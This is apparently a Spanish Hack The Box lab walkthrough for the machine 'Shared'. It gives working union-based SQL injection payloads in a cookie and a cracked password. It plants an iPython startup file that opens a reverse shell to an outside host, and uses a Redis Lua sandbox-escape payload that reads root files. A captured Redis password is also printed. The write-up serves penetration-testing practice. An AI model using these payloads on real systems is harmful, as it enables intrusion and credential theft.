Shared



Conocimientos

  • Enumeraci贸n Web

  • SQL Inyection

  • Abuso de tarea CRON

  • iPython Arbitrary Code Execution - CVE-2022-21699

  • Abuso de Redis - SandBox Escape (Escalada de Privilegios)


Reconocimiento

Escaneo de puertos con nmap

Descubrimiento de puertos abiertos

nmap -p- --open --min-rate 5000 -n -Pn -sS 10.10.11.172 -oG openports
Starting Nmap 7.94 ( https://nmap.org ) at 2023-07-27 21:26 GMT
Nmap scan report for 10.10.11.172
Host is up (0.052s latency).
Not shown: 64661 closed tcp ports (reset), 871 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT    STATE SERVICE
22/tcp  open  ssh
80/tcp  open  http
443/tcp open  https

Nmap done: 1 IP address (1 host up) scanned in 15.74 seconds

Escaneo de versi贸n y servicios de cada puerto

nmap -sCV -p22,80,443 10.10.11.172 -oN portscan
Starting Nmap 7.94 ( https://nmap.org ) at 2023-07-27 21:27 GMT
Nmap scan report for 10.10.11.172
Host is up (0.063s latency).

PORT    STATE SERVICE  VERSION
22/tcp  open  ssh      OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
| ssh-hostkey: 
|   3072 91:e8:35:f4:69:5f:c2:e2:0e:27:46:e2:a6:b6:d8:65 (RSA)
|   256 cf:fc:c4:5d:84:fb:58:0b:be:2d:ad:35:40:9d:c3:51 (ECDSA)
|_  256 a3:38:6d:75:09:64:ed:70:cf:17:49:9a:dc:12:6d:11 (ED25519)
80/tcp  open  http     nginx 1.18.0
|_http-server-header: nginx/1.18.0
|_http-title: Did not follow redirect to http://shared.htb
443/tcp open  ssl/http nginx 1.18.0
|_ssl-date: TLS randomness does not represent time
|_http-server-header: nginx/1.18.0
| tls-nextprotoneg: 
|   h2
|_  http/1.1
| tls-alpn: 
|   h2
|_  http/1.1
| ssl-cert: Subject: commonName=*.shared.htb/organizationName=HTB/stateOrProvinceName=None/countryName=US
| Not valid before: 2022-03-20T13:37:14
|_Not valid after:  2042-03-15T13:37:14
|_http-title: Did not follow redirect to https://shared.htb
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 18.59 seconds

A帽ado el dominio shared.htb al /etc/hosts

Puerto 80,443 (HTTP, HTTPS)

Con whatweb analizo las tecnolog铆as que emplea el servidor web

whatweb http://10.10.11.172
http://10.10.11.172 [301 Moved Permanently] Country[RESERVED][ZZ], HTTPServer[nginx/1.18.0], IP[10.10.11.172], RedirectLocation[http://shared.htb], Title[301 Moved Permanently], nginx[1.18.0]
http://shared.htb [301 Moved Permanently] Country[RESERVED][ZZ], HTTPServer[nginx/1.18.0], IP[10.10.11.172], RedirectLocation[https://shared.htb/], nginx[1.18.0]
https://shared.htb/ [302 Found] Country[RESERVED][ZZ], HTTPServer[nginx/1.18.0], IP[10.10.11.172], RedirectLocation[https://shared.htb/index.php], nginx[1.18.0]
https://shared.htb/index.php [200 OK] Cookies[PHPSESSID,PrestaShop-5f7b4f27831ed69a86c734aa3c67dd4c], Country[RESERVED][ZZ], HTML5, HTTPServer[nginx/1.18.0], HttpOnly[PHPSESSID,PrestaShop-5f7b4f27831ed69a86c734aa3c67dd4c], IP[10.10.11.172], JQuery, Open-Graph-Protocol[website], PoweredBy[PrestaShop], PrestaShop[EN], Script[application/ld+json,text/javascript], Title[Shared Shop], X-UA-Compatible[ie=edge], nginx[1.18.0]

La p谩gina principal se ve as铆:

Encuentro un subdominio por fuerza bruta

wfuzz -c -t 200 --hh=169 -w /usr/share/wordlists/SecLists/Discovery/DNS/subdomains-top1million-5000.txt -H "Host: FUZZ.shared.htb" https://shared.htb/
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************

Target: https://shared.htb/
Total requests: 4989

=====================================================================
ID           Response   Lines    Word       Chars       Payload                                                                                                                                         
=====================================================================

000000001:   302        0 L      0 W        0 Ch        "www"                                                                                                                                           
000002549:   200        64 L     151 W      3229 Ch     "checkout"                                                                                                                                      

Total time: 0
Processed Requests: 4989
Filtered Requests: 4987
Requests/sec.: 0

A帽ado checkout.shared.htb al /etc/hosts. Se ve as铆:

Meto en el carro un producto

Me redirige a la secci贸n de pago

Se me asigna una nueva cookie de sesi贸n

Cookie: custom_cart=%7B%2253GG2EF8%22%3A%221%22%7D

Intercepto la petici贸n con BurpSuite para enumerar el n煤mero de columnas. En total son 3. En caso contrario aparece un error de Not Found

Cookie: custom_cart={"53GG2EF8' order by 3-- -":"1"}; 

Aplico una selecci贸n y mi input se ve reflejado en el output

Cookie: custom_cart={"' union select 1,2,3-- -":"1"}; 

Listo las bases de datos

Cookie: custom_cart={"' union select 1,group_concat(schema_name),3 from information_schema.schemata-- -":"1"};

Y las tablas para checkout

Cookie: custom_cart={"' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=\"checkout\"-- -":"1"}; 

Para user, las columnas

Cookie: custom_cart={"' union select 1,group_concat(column_name),3 from information_schema.columns where table_schema=\"checkout\" and table_name=\"user\"-- -":"1"}; 

Dumpeo los datos

Cookie: custom_cart={"' union select 1,group_concat(username,0x3a,password),3 from checkout.user-- -":"1"};

Lo crackeo con john

john -w:/usr/share/wordlists/rockyou.txt hashes --format=Raw-MD5
Using default input encoding: UTF-8
Loaded 1 password hash (Raw-MD5 [MD5 256/256 AVX2 8x3])
Warning: no OpenMP support for this hash type, consider --fork=4
Press 'q' or Ctrl-C to abort, almost any other key for status
Soleil101        (james_mason)     
1g 0:00:00:00 DONE (2023-07-27 22:09) 12.50g/s 26136Kp/s 26136Kc/s 26136KC/s Sports5..Soccer95
Use the "--show --format=Raw-MD5" options to display all of the cracked passwords reliably
Session completed. 

Gano acceso por SSH

ssh james_mason@10.10.11.172
The authenticity of host '10.10.11.172 (10.10.11.172)' can't be established.
ED25519 key fingerprint is SHA256:UXHSnbXewSQjJVOjGF5RVNToyJZqtdQyS8hgr5P8pWM.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.11.172' (ED25519) to the list of known hosts.
james_mason@10.10.11.172's password: 
Linux shared 5.10.0-16-amd64 #1 SMP Debian 5.10.127-1 (2022-06-30) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Thu Jul 14 14:45:22 2022 from 10.10.14.4
james_mason@shared:~$

Pertenezco al grupo developer

james_mason@shared:~$ id
uid=1000(james_mason) gid=1000(james_mason) groups=1000(james_mason),1001(developer)

Busco archivos cuyo grupo asignado sea este

james_mason@shared:/$ find \-group developer 2>/dev/null 
./opt/scripts_review

Es un directorio vac铆o, pero dentro tengo capacidad de escritura

james_mason@shared:/opt/scripts_review$ ls -la
total 8
drwxrwx--- 2 root developer 4096 Jul 14  2022 .
drwxr-xr-x 3 root root      4096 Jul 14  2022 ..

Subo el pspy para detectar tareas que se ejecutan a intervalos regulares de tiempo

2023/06/30 05:09:01 CMD: UID=1001 PID=1135   | /bin/sh -c /usr/bin/pkill ipython; cd /opt/scripts_review/ && /usr/local/bin/ipython 

Est谩 ejecutando con ipython los scripts de esa ruta. En este POC explican como elevar privilegios

james_mason@shared:/opt/scripts_review$ mkdir -m 777 profile_default
james_mason@shared:/opt/scripts_review$ mkdir -m 777 profile_default/startup
james_mason@shared:/opt/scripts_review$ echo "import os; os.system('bash -c \"bash -i >& /dev/tcp/10.10.16.2/443 0>&1\"')" > profile_default/startup/foo.py

Gano acceso como este usuario en una sesi贸n de netcat

nc -nvlp 443
listening on [any] 443 ...
connect to [10.10.16.2] from (UNKNOWN) [10.10.11.172] 58950
bash: cannot set terminal process group (1498): Inappropriate ioctl for device
bash: no job control in this shell
dan_smith@shared:/opt/scripts_review$

Puedo ver la primera flag

dan_smith@shared:~$ cat user.txt 
6b944f4b614ee5fa3aac526303074525

Escalada

El nuevo usuario pertenece al grupo sysadmin

dan_smith@shared:~$ id
uid=1001(dan_smith) gid=1002(dan_smith) groups=1002(dan_smith),1001(developer),1003(sysadmin)

Busco por archivos perteneciente a este grupo

dan_smith@shared:/$ find \-group sysadmin 2>/dev/null 
./usr/local/bin/redis_connector_dev

Es un binario compilado de 64 bits. Lo transfiero a mi equipo

/usr/local/bin/redis_connector_dev: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, Go BuildID=sdGIDsCGb51jonJ_67fq/_JkvEmzwH9g6f0vQYeDG/iH1iXHhyzaDZJ056wX9s/7UVi3T2i2LVCU8nXlHgr, not stripped

Utilizo chisel para aplicar Remote Port Forwarding. Desde mi equipo lo ejecuto como servidor

chisel server -p 1234 --reverse

En la m谩quina v铆ctima como cliente

dan_smith@shared:/tmp$ ./chisel client 10.10.16.2:1234 R:6379:127.0.0.1:6379

Ejecuto y desde el WireShark intercepto credenciales a trav茅s de la interfaz LoopBack

./redis_connector_dev
[+] Logging to redis instance using password...

INFO command result:
# Server
redis_version:6.0.15
redis_git_sha1:00000000
redis_git_dirty:0
redis_build_id:4610f4c3acf7fb25
redis_mode:standalone
os:Linux 5.10.0-16-amd64 x86_64
arch_bits:64
multiplexing_api:epoll
atomicvar_api:atomic-builtin
gcc_version:10.2.1
process_id:1761
run_id:482fb1de80d649ad1650f27e76d85052b5ecff09
tcp_port:6379
uptime_in_seconds:5
uptime_in_days:0
hz:10
configured_hz:10
lru_clock:10395992
executable:/usr/bin/redis-server
config_file:/etc/redis/redis.conf
io_threads_active:0
 <nil>

Me conecto. Sin la credencial no podr铆a hacer nada

dan_smith@shared:/tmp$ redis-cli
127.0.0.1:6379> INFO keyspace
NOAUTH Authentication required.
127.0.0.1:6379> auth F2WHqJUz2WEz=Gqq
OK

Es vulnerable al CVE-2022-0543

Puedo ver la segunda flag

127.0.0.1:6379> eval 'local io_l = package.loadlib("/usr/lib/x86_64-linux-gnu/liblua5.1.so.0", "luaopen_io"); local io = io_l(); local f = io.popen("cat /root/root.txt", "r"); local res = f:read("*a"); f:close(); return res' 0
"640ba35cad6c58f8c74fdc7b38912f63\n"